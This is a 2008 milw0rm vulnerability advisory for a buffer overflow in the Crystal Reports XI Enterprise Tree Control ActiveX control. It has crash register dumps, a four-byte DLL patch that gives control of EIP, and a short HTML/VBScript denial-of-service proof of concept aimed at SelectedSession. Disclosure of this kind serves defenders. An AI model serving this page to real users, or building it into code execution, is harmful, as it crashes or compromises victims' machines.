Docstoc
EXCLUSIVE OFFER FOR DOCSTOC USERS
Try the all-new QuickBooks Online for FREE.  No credit card required.

Crystal Reports XI Release 2 Enterprise Tree Control ActiveX BOFDoS

Document Sample
Crystal Reports XI Release 2 Enterprise Tree Control ActiveX BOFDoS Powered By Docstoc
					                   Crystal Reports XI Release 2 Enterprise Tree Control ActiveX BOFDoS         Page 1/4
   1   #####################################################################################
   2
   3   Application:  Crystal Reports XI Release 2 (Enterprise Tree Control) Remote BoF/Dos
   4                 www.businessobjects.com
   5   Versions:     11
   6   Platforms:    Windows XP Professional
   7   Bug:          buffer−overflow
   8   Exploitation: remote
   9   Date:         2007−01−16
  10
  11   Author:        shinnai
  12                  e−mail: shinnai[at]autistici[dot]org
  13                  web:    http://shinnai.altervista.org
  14
  15   #####################################################################################
  16
  17   1)   Introduction
  18   2)   Technical details and bug
  19   3)   The Code
  20   4)   Fix
  21
  22   #####################################################################################
  23
  24   ===============
  25   1) Introduction
  26   ===============
  27
  28   This component is used to visualize on the web reports created with
  29   Crystal Reports
  30
  31   #####################################################################################
  32
  33   ============================
  34   2) Technical details and bug
  35   ============================
  36
  37   Name:     EnterpriseControls.dll
  38   Ver.:     11.5.0.313
  39   CLSID:    {3D58C9F3−7CA5−4C44−9D62−C5B63E059050}
  40   MD5:      179e2dc7f9f6e9d6e0210e89c623fd72
  41
  42   Marked as:
  43   RegKey Safe for Script: True
  44   RegKey Safe for Init: True
  45   Implements IObjectSafety: True
  46   IDisp Safe: Safe for untrusted: caller,data
  47   IPStorage Safe: Safe for untrusted: caller,data
  48
  49   The problem is a buffer−overflow which occours when you use the
  50   "SelectedSession()" method.
  51   It seems that, during the initialization of the component, a race
  52   condition occours between threads and 4 bytes of the same component
shinnai                                                                                        01/17/2008
                  Crystal Reports XI Release 2 Enterprise Tree Control ActiveX BOFDoS      Page 2/4
  53    will overwrite EIP.
  54    If you patch these 4 bytes, you can control this register, using
  55    it to jump to a shellcode and execute arbitrary code on user’s pc.
  56    For exploiting this vulnerability you only need to create a web
  57    page containing the CLSID and the codebase path to your crafted
  58    ActiveX.
  59    These are registers using the original file:
  60    14:59:34.126 pid=1468 tid=1250 EXCEPTION (first−chance)
  61                  −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  62                  Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
  63                  −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  64                  EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF−FF FF 83 6C 24 04 2C E9
  65                  EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A−00 C7 4D 5A D4 C6 4D 5A
  66                  ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A−6F 6C 44 5A E4 6F 44 5A
  67                  EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A−6F 6C 44 5A E4 6F 44 5A
  68                  ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A−C8 F7 44 5A 68 F4 FC 01
  69                  EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A−68 F4 FC 01 54 F7 07 03
  70                  ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65−77 6F 72 6B 5F 73 64 6B
  71                  EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A−01 00 00 00 30 C5 4D 5A
  72                  EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??−?? ?? ?? ?? ?? ?? ?? ??
  73                                −−> N/A
  74                  −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  75
  76    14:59:34.142   pid=1468 tid=1250 EXCEPTION (unhandled)
  77                   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  78                   Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
  79                   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  80                   EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF−FF FF 83 6C 24 04 2C E9
  81                   EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A−00 C7 4D 5A D4 C6 4D 5A
  82                   ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A−6F 6C 44 5A E4 6F 44 5A
  83                   EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A−6F 6C 44 5A E4 6F 44 5A
  84                   ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A−C8 F7 44 5A 68 F4 FC 01
  85                   EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A−68 F4 FC 01 54 F7 07 03
  86                   ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65−77 6F 72 6B 5F 73 64 6B
  87                   EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A−01 00 00 00 30 C5 4D 5A
  88                   EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??−?? ?? ?? ?? ?? ?? ?? ??
  89                                 −−> N/A
  90                   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  91
  92    We’ll find these 4 bytes at this address:
  93    0x000172D8 "28 E9 7D FF"...
  94
  95    using an hex editor to modify to:
  96    0x000172D8 "42 42 42 42"...
  97
  98    we’ll have:
  99
  100   C:\Tools>bindiff /c /d EnterpriseControls_patched.dll EnterpriseControls_ori.dll
  101
  102   Different, Left is newer 4 bytes differ
  103   ================================================================================
  104   000172D0 87 FF FF FF 83 6C 24 04 .....l$.     87 FF FF FF 83 6C 24 04 .....l$.
shinnai                                                                                    01/17/2008
                  Crystal Reports XI Release 2 Enterprise Tree Control ActiveX BOFDoS      Page 3/4
  105   000172D8 <42 42 42 42>FF FF 83 6C BBBB...l <28 E9 7D FF>FF FF 83 6C (.}....l
  106   000172E0 24 04 2C E9               $.,.       24 04 2C E9              $.,.
  107   ================================================================================
  108
  109   File Count Summary
  110      Identical:        0   files
  111      Near Identical:   0   files
  112      Different:        1   files
  113      Left Only:        0   files
  114      Right Only:       0   files
  115      Errors:           0   files
  116      Total:            1   files
  117
  118   Byte Count Summary
  119      Matched:    4 bytes differ
  120      Left Only: 0 bytes
  121      Right Only: 0 bytes
  122      Total:      4 bytes
  123
  124   and registers values will be:
  125   15:05:38.947 pid=12D4 tid=1240 EXCEPTION (first−chance)
  126                 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  127                 Exception C0000005 (ACCESS_VIOLATION reading [42424242])
  128                 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  129                 EAX=5A4472D4: 83 6C 24 04 42 42 42 42−FF FF 83 6C 24 04 2C E9
  130                 EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A−00 C7 4D 5A D4 C6 4D 5A
  131                 ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A−6F 6C 44 5A E4 6F 44 5A
  132                 EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A−6F 6C 44 5A E4 6F 44 5A
  133                 ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A−C8 F7 44 5A 8C F4 FC 01
  134                 EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A−8C F4 FC 01 CC 99 9D 02
  135                 ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65−77 6F 72 6B 5F 73 64 6B
  136                 EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A−01 00 00 00 30 C5 4D 5A
  137                 EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??−?? ?? ?? ?? ?? ?? ?? ??
  138                               −−> N/A
  139                 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  140
  141   15:05:38.978   pid=12D4 tid=1240 EXCEPTION (unhandled)
  142                  −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  143                  Exception C0000005 (ACCESS_VIOLATION reading [42424242])
  144                  −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  145                  EAX=5A4472D4: 83 6C 24 04 42 42 42 42−FF FF 83 6C 24 04 2C E9
  146                  EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A−00 C7 4D 5A D4 C6 4D 5A
  147                  ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A−6F 6C 44 5A E4 6F 44 5A
  148                  EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A−6F 6C 44 5A E4 6F 44 5A
  149                  ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A−C8 F7 44 5A 8C F4 FC 01
  150                  EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A−8C F4 FC 01 CC 99 9D 02
  151                  ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65−77 6F 72 6B 5F 73 64 6B
  152                  EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A−01 00 00 00 30 C5 4D 5A
  153                  EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??−?? ?? ?? ?? ?? ?? ?? ??
  154                                −−> N/A
  155                  −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  156

shinnai                                                                                    01/17/2008
                  Crystal Reports XI Release 2 Enterprise Tree Control ActiveX BOFDoS           Page 4/4
  157   isn’t it fun?
  158   Naturally, EIP overwrite requires that someone uses the crafted dll otherwise
  159   you can just enjoy a crash of tha application.
  160
  161   #####################################################################################
  162
  163   ===========
  164   3) The Code
  165   ===========
  166
  167   I will release a public exploit but, this time, no code execution ;−)
  168   Everything I could say is that you can directly inject your shellcode into the dll
  169   or pass an argument to "SelectedSession()" method and then jump to the shellcode.
  170
  171   Poc: Click here for DoS exploit
  172
  173   <html>
  174    <object classid=’clsid:3D58C9F3−7CA5−4C44−9D62−C5B63E059050’ id=’test’></object>
  175     <script language = ’vbscript’>
  176      test.SelectedSession = ""
  177     </script>
  178   </html>
  179
  180   #####################################################################################
  181
  182   ======
  183   4) Fix
  184   ======
  185
  186   No fix
  187
  188   #####################################################################################
  189
  190   # milw0rm.com [2008−01−17]




shinnai                                                                                         01/17/2008

				
DOCUMENT INFO